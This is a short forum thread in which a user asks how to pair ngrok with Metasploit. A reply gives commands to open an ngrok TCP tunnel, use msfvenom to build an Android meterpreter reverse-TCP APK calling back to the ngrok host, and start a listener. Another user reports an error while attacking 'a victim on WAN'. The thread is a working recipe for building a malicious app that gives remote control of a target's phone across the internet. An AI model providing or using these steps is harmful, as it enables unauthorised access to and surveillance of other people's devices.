Forum Thread: How to Use Ngrok for Port Forwarding in Metasploit?

I am confused about Using URL and PORTS of Ngrok?
Can anyone please specify using screenshots where and how to use them in Metasploit after creating a payload ?

2 Responses

Hmmm... If you want to make a payload with ngrok instead of using port forwarding you should do :
To start forwarding from 0.tcp.ngrok.io (port **)to localhost 4444 :
./ngrok tcp 4444

Now make the payload (Android for example)
msfevom -p android/meterpreter/reversetcp LHOST=0.tcp.ngrok.io LPORT=<Yourngrok_port> R > /root/payload.apk

And for the listener, set lhost to 0.0.0.0 ans lport to 4444
: )

Error During exploit a victim on WAN

Failed to load extension: No response was received to the core_enumextcmd request

Share Your Thoughts

  • Hot
  • Active